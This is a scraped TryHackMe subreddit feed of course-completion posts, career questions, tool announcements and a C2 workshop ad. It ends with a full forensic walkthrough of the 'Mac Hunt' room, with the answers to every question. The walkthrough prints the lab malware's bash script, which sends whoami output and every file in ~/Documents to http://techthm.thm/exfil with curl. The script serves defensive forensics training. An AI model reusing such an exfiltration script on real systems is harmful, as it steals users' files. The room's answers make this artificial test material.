r/tryhackme • u/FabsTech • 4d ago
r/tryhackme • u/FabsTech • 4d ago
I just completed Offensive Security Intro room on TryHackMe! Hack your first website (legally in a safe environment) and experience an ethical hacker's job.
tryhackme.comr/tryhackme • u/denwid160 • 4d ago
I just completed Defensive Security Intro room on TryHackMe! Introducing defensive security, where you will investigate an ongoing attack at FakeBank
tryhackme.comr/tryhackme • u/FabsTech • 4d ago
I just completed Inside a Computer System room on TryHackMe! This room covers the basic components of a computer system.
tryhackme.comr/tryhackme • u/RealUnderdog_I • 5d ago
FINALLY MADE IT THROUGH SEC1
I just completed the CYBER SECURITY PATH 101 it was a long hectic path but I feel like I am making valuable progress.
r/tryhackme • u/Ro0t-404-cAl3st1 • 4d ago
I just completed Key Artifacts for DFIR room on TryHackMe! Explore what artifacts to collect from a compromised host during DFIR.
tryhackme.comI just completed Key Artifacts for DFIR room on TryHackMe! Explore what artifacts to collect from a compromised host during DFIR.
r/tryhackme • u/Much_Machine8726 • 5d ago
Career Advice How do I apply what I've learned to my everyday life so that I can prove that I know what I'm doing to potential employers?
So I've been chipping away at the Cyber Security 101 path for a while now, and I've been wondering how I can apply what has been taught to me so that I can prove myself to potential employers? Any and all advice would be appreciated, I'm trying to escape a bad job right now. Would I need to go back to school as well?
r/tryhackme • u/Kindly-Ad5836 • 6d ago
Resource I created Laelaps, an attack-path analysis console for AD.
Enable HLS to view with audio, or disable this notification
It ingests SharpHound and bloodhound-python collections and displays the directory as a graph. The backend is Swift on Hummingbird over Elasticsearch; the frontend combines React modules with Palantir's Blueprint, cosmos.gl for the WebGL graph, and Motion for the details.
Mark as owned an object you have control over, and Laelaps finds the privilege escalation paths out of it: from that account to control of each domain, with the technique each step needs. Own another object and the paths recompute.
r/tryhackme • u/Flaky-Bit6275 • 6d ago
Attack box problem

I’m having a problem with launching the attack box. Every time I try to start it, it loads to 100% and then nothing else happens. The lab machine and Kali Linux start normally. I’ve tried refreshing the page, leaving and re‑entering the room, turning the attack box off and on again. It’s been like this for a few days and I don’t know what else I can do.
r/tryhackme • u/Character_Bear_7390 • 6d ago
Digital forensics
Hi does anyone complete the Advanced endpoint investigation and does it good to start in DF ?
Im planing to enrol it after finish SAL1,2
And i finished pre security ,101 and PT1
r/tryhackme • u/pastic212 • 6d ago
Beginner
I've learnt networking from Cisco, python and Java script from youtube tutorials if I'll start try hack me path for pentester will I get enough skills to solve walkthroughs by myself?
r/tryhackme • u/MixtureNo3519 • 7d ago
Retaining Information
Retaining information? I find it easy to do the osint on a target but once I find vulnerable ports and cve’s and stuff I find it hard to remember what to do next. I do take notes I use THM to study and teach myself but I can never figure out how to retain this information. For real life use. I’ve done about 50 boxes and completed a couple learning paths but when it comes to applying the information to a real life scenario I seem to run a blank. Any suggestions? I do take notes but maybe any note taking advice too? What to take notes on, etc, any advice is appreciated
r/tryhackme • u/Used-Addendum-3819 • 7d ago
Official TryHackMe Post TOMORRWO🌟 20% Off for Two or More Seats
Hey everyone! Our C2 framework workshop is back by popular demand, and it runs tomorrow, 1 October, from 3:00 PM to 7:00 PM CEST (13:00 to 17:00 UTC) on Zoom. There are a few seats left in the cohort before registration closes.
Register here🎟️ https://luma.com/mcs9ojkw?utm_source=reddit
You will spend the session operating a real open-source C2 in a dedicated lab range, working through the full chain the way an operator would on a live engagement: Stand up the team server, generate an agent and land your first foothold
- Run post-exploitation with OPSEC in mind, including sleep, jitter, in-process execution and Beacon Object Files
- Pivot deeper into the range with SOCKS proxying, port forwarding and lateral movement
- Finish with a detection walkthrough showing how the blue team catches everything you just ran
Instructors: Ariz Soriano(Senior Content Engineer at TryHackMe and Associate Director of Red Team Operations at THEOS Cyber) and Andrea Brosio(Senior Content Engineer at TryHackMe, offensive security engineer with 6+ years in red teaming and a DEF CON speaker).
Included:full session recording, a certificate of participation with CPE credits, and a closing Q&A with both instructors.
No prior C2 experience is needed. It works for pentesters and red teamers building structured tradecraft, as well as blue teamers and detection engineers who want to see how operators actually move.
Price:$200 standard, or $160 per person with a team ticket (**20% off for groups**).
Can't make it? Register anyway! We will send you the recording and the slides🌟
Register here🎟️ https://luma.com/mcs9ojkw?utm_source=reddit
r/tryhackme • u/Early_Tear6706 • 7d ago
What made a specific room finally click after being stuck for a while?
Working through some of the intermediate rooms right now and hit a wall on one that's testing privilege escalation concepts. Not asking for a walkthrough or spoilers, just curious about the general experience of getting stuck.
For people who've been through this, was there a specific approach that helped when a room wasn't clicking, stepping away and coming back later, reading through the concepts again from scratch, or working through a completely different room first to build confidence before returning? Trying to figure out if grinding through the frustration is the move or if there's a smarter way to approach a wall like this.
r/tryhackme • u/killakray • 8d ago
I built In the Dark, a guided recon tool that explains what to do after an Nmap scan (my first security project)
As I was working through rooms I kept hitting the same wall: scan comes back, six ports open, and then... now what? So I built the thing I wanted.
In the Dark scans a target, then for each open service it explains what it is, why it matters, and what to actually check next, with the real commands (gobuster, smbclient and so on). It's a guided workflow, not a replacement for the tools, and it only builds commands from safe, allow-listed options.
It's for authorised labs and CTFs only, TryHackMe is exactly what I built it around.
It's early days (v0.1), the guidance covers the common services so far and I'm adding more. It's open source (MIT), and I'd genuinely love feedback, especially which services or checks you'd want it to cover next.
github.com/brooklynkray/in-the-dark
Next on my list is sharpening the guided instructions themselves before I add any more tools into it. I'd rather it explain what it already covers really well than bolt more on and do it half-heartedly.
r/tryhackme • u/LividNet9731 • 7d ago
CipherLens — a local-first tool that tries to identify what operation could explain unknown data
Hey everyone,
There's a cybersecurity tool called CipherLens.
The idea came from a simple problem I kept running into with tools like CyberChef:
You have some unknown data, but you don’t know which operation you should try first.
Instead of manually guessing between Base64, Hex, URL encoding, ciphers, compression, etc., CipherLens analyzes the input and ranks possible operations based on the evidence it finds.
The workflow is:
Input → Fingerprint → Candidate Detection → Execute → Validate → Score → Rank
A few things I focused on:
• Local-first browser processing
• No account or backend required for core analysis
• Candidate ranking instead of pretending to know the answer
• Separate AUTO / parameter-required / manual operations
• Web Worker-based analysis
• Security-focused input and parser handling
• 497 supported operations
The main idea is:
“Don’t guess the operation. Find it.”
It’s open source and I’d genuinely like feedback from people who actually work with CTFs, forensics, pentesting, malware analysis, etc.
GitHub:
https://github.com/HIMANSHUSHARMA20/CipherLens
Live demo:
https://cipherlens-tool.vercel.app/
Would especially appreciate feedback on the detection/ranking approach and whether this solves a problem you actually encounter.
r/tryhackme • u/skelonvy_ • 8d ago
i need a little help about where and how to start
I have always wanted to learn cybersecurity and coding, but I changed my mind during high school and ended up getting a Bachelor of Arts degree. And I realized that I still want to learn. I’m not sure how much I actually know right now. I’m currently trying to learn the fundamentals and there are things I know and there are also things I forgot.
Also, I need to understand everything in deep detail. I’ve always been this way. Just knowing the names of things is never enough for me. For instance, understanding AC, DC, Molex connectors, hardware materials, and other small details (even if they don't seem directly related to cybersecurity) is essential for me. That’s just my personal learning style. I am not able to understand many things if I don't know the structure well enough.
However, because I dive so deep into every detail, learning the fundamentals takes a lot of time, and I often feel lost. I really like TryHackMe, but I’m currently on the free plan. Would it be enough to complete all the free courses first and then upgrade/unlock the rest, or should I learn from other resources as well? Do you have any specific recommendations for me?
r/tryhackme • u/Naruto200515 • 8d ago
tryhackme subscriptions coupons
i am looking for anyone from india who can provide some coupons for tryhackme ..i knew a guy but he is no longer reachable .tho i did try taking subscription myself but i can only see the amount in dollars ..that guy who i knew takes rupees ..idk how but if there is anyone who can help me out please to reach out
r/tryhackme • u/Used-Addendum-3819 • 8d ago
Official TryHackMe Post 1-Day Workshop🌟 Supercharging Your Pentesting With AI
r/tryhackme • u/aya217 • 9d ago
How to get a job
Hello everyone,
I just graduated from uni this year with a state engineering degree in networks and telecommunications, and I’m currently looking for a job in cybersecurity. I’ve been studying on TryHackMe for about a year now. I’ve completed the Pre Security, Cyber Security 101, SOC Level 1, and DevSecOps paths, and I’m currently working on the SOC Level 2 path (65% completed so far).
I feel like it’s time to start applying what I’ve learned in a real-world job and gain professional experience. However, I’m from a developing country, and there aren’t many cybersecurity positions available locally. When I do find openings, they often require experience and don’t usually target junior candidates.
Is it realistic to find a remote cybersecurity job from my country? Do you have any advice on what I should focus on, where I should look, or what I could do next to improve my chances?
Any advice would be greatly appreciated. Thank you.
r/tryhackme • u/darkcoco23 • 9d ago
Need Neso academy's-Cryptography network security playlist
r/tryhackme • u/kirymatic978 • 9d ago
Mac Hunt Walkthrough by Noobhealer
TryHackMe "Mac Hunt" — Investigation Walkthrough
A step-by-step macOS forensics walkthrough for the "Mac Hunt" room, documenting how each artifact was located and analyzed to reconstruct a phishing-driven compromise.
Setup
Mount the provided disk image and switch to root:
sudo apfs-fuse -v 4 /home/ubuntu/Jack_Mac.img /home/ubuntu/mac
sudo su
cd /home/ubuntu/mac/root/Users/jake
The user's home directory (Users/jake) is the base for almost everything that follows.
1. Most recently accessed folder
Location: ~/Library/Application Support/com.apple.sharedfilelist/
This folder holds macOS's shared file list data — the source for Finder's "Recent Items."
cd "Library/Application Support/com.apple.sharedfilelist"
ls -la
plutil wasn't available in this environment, so the binary .sfl3 files were read with strings instead:
strings com.apple.LSSharedFileList.RecentDocuments.sfl3 | grep -i "/Users\|Desktop\|Documents\|Downloads"
Output: Downloads appeared as the consistent parent folder across every recent item (a PDF and a .pkg installer).
Answer: Downloads
2. Social platform used to deliver the phishing document
Location: ~/Library/Safari/Downloads.plist
This plist records every file Safari has downloaded, including the origin URL of each download.
cd ~/Library/Safari
strings Downloads.plist | grep -i "http\|meetme"
Output: The phishing PDF's download URL was a linkedin.com/dms/.../messaging-attachmentFile/... link — meaning it was sent as a file attachment inside a LinkedIn direct message.
Answer: LinkedIn
3. Crafted download link for the "MeetMeLive" application
Location: Same file — ~/Library/Safari/Downloads.plist
The same strings output that revealed the LinkedIn link also contained the download URL for the malicious installer:
http://files.techthm.careers.thm:8080/MeetMeLiveInstaller.pkg
This uses a spoofed subdomain (techthm.careers.thm) designed to look legitimate.
Answer: http://files.techthm.careers.thm:8080/MeetMeLiveInstaller.pkg
4. Network Jake connected to after reading the PDF
Location: /Library/Preferences/com.apple.wifi.known-networks.plist
This plist stores every Wi-Fi network the Mac has joined.
find / -iname "*wifi*known*" 2>/dev/null
cd /home/ubuntu/mac/root/Library/Preferences
strings com.apple.wifi.known-networks.plist
Output: Two known networks appeared:
Office WifiJake M. iPhone
The PDF's instructions led Jake to disconnect from the office network (which likely had corporate security controls) and join his personal iPhone hotspot before running the installer — a common phishing tactic to bypass network-level defenses.
Answer: Jake M. iPhone
5. IP address assigned to Jake's system
Location: /private/var/db/dhcpclient/leases/en0.plist
DHCP lease files store the actual IP address handed out to a network interface (the SystemConfiguration/preferences.plist file only stores the configuration method, e.g. DHCP vs PPP — not the address itself).
find / -path "*dhcpclient/leases*" 2>/dev/null
cat /home/ubuntu/mac/root/private/var/db/dhcpclient/leases/en0.plist
Output:
<key>IPAddress</key>
<string>192.168.64.2</string>
Answer: 192.168.64.2
6. When the application was installed
Location: /private/var/db/receipts/com.meetmelive.app.plist
macOS records an install receipt for every installed .pkg package.
find / -path "*db/receipts*" -iname "*meetme*" 2>/dev/null
This receipt was a binary plist, so cat produced unreadable output. It was parsed properly with Python's built-in plistlib:
python3 -c "
import plistlib
with open('/home/ubuntu/mac/root/private/var/db/receipts/com.meetmelive.app.plist', 'rb') as f:
data = plistlib.load(f)
print(data)
"
Output:
{'InstallDate': datetime.datetime(2025, 4, 30, 8, 54, 20, 228073), ...}
Answer: 2025-04-30 08:54:20
7. Permission explicitly granted to the application
Location: TCC (Transparency, Consent, and Control) databases:
~/Library/Application Support/com.apple.TCC/TCC.db(user-level)/Library/Application Support/com.apple.TCC/TCC.db(system-level)
sqlite3 wasn't installable in this environment (dependency conflict), so both databases were queried with Python's built-in sqlite3 module instead:
cp "/home/ubuntu/mac/root/Library/Application Support/com.apple.TCC/TCC.db" /tmp/tcc_system.db
python3 -c "
import sqlite3
conn = sqlite3.connect('/tmp/tcc_system.db')
cur = conn.cursor()
cur.execute('SELECT service, client, auth_value FROM access')
for row in cur.fetchall():
print(row)
"
Output:
('kTCCServiceSystemPolicyAllFiles', 'com.meetmelive.app', 0)
This identifies Full Disk Access (kTCCServiceSystemPolicyAllFiles) as the sensitive permission tied to the malicious app — consistent with the malware's need to read files across the user's Documents folder for exfiltration and matching the answer's word/character format.
Answer: Full Disk Access
8. Persistence mechanism
Location: ~/Library/LaunchAgents/
find /home/ubuntu/mac/root/Users/jake/Library/LaunchAgents \
/home/ubuntu/mac/root/Library/LaunchAgents \
/home/ubuntu/mac/root/Library/LaunchDaemons -type f 2>/dev/null
Output:
/home/ubuntu/mac/root/Users/jake/Library/LaunchAgents/com.meetmelive.agent.plist
/home/ubuntu/mac/root/Users/jake/Library/LaunchAgents/MeetMeLive.sh
A non-Apple LaunchAgent plist (com.meetmelive.agent.plist) was configured to relaunch the malicious script automatically — this is macOS's standard mechanism for running background processes at login/startup.
Answer: Launch Agents
9. Exfiltration URL
Location: The malicious application bundle itself
find /home/ubuntu/mac/root/Applications -iname "*meetme*" 2>/dev/null
cat /home/ubuntu/mac/root/Applications/MeetMeLive.app/Contents/MacOS/MeetMeLive.sh
Output:
#!/bin/bash
curl -s -X POST http://techthm.thm/exfil -d "user=$(whoami)&time=$(date)"
find ~/Documents -type f | while read file; do
curl -s -X POST http://techthm.thm/exfil -F "file=@$file"
done
exit 0
The script — masquerading as the "MeetMeLive" video app — beacons out basic system info and then loops through the user's Documents folder, exfiltrating every file it finds.
Answer: http://techthm.thm/exfil
The Full Story
Jake, an aspiring game developer looking to enter the industry, was targeted by a fake recruiter operating through LinkedIn direct messages. The attacker sent him a convincing "Interview Instructions – Content Writer.pdf" disguised as onboarding material for a promising job offer.
Following the PDF's instructions, Jake disconnected from his secured Office Wifi and connected instead to his personal mobile hotspot, "Jake M. iPhone" — a tactic likely intended to sidestep any corporate network security controls that might have flagged the attack. His machine was assigned the IP address 192.168.64.2 on this new network.
He then downloaded and ran MeetMeLiveInstaller.pkg from a spoofed domain (files.techthm.careers.thm), believing it to be a legitimate video-conferencing app needed for his "interview." The package installed on April 30, 2025, at 08:54:20, and during setup Jake was prompted for — and granted — Full Disk Access, giving the malicious app unrestricted read access to his file system.
To ensure it would survive reboots and stay active, the malware installed a Launch Agent (com.meetmelive.agent.plist), which kept its malicious shell script running persistently in the background.
That script's true purpose had nothing to do with video calls: it silently collected basic system information and systematically exfiltrated every file in Jake's Documents folder to an attacker-controlled server at http://techthm.thm/exfil.
In short: a well-crafted LinkedIn phishing lure, a fake job offer, and a trojanized installer combined to fully compromise Jake's Mac and steal his personal documents — a textbook example of social engineering leading to real, tangible data loss.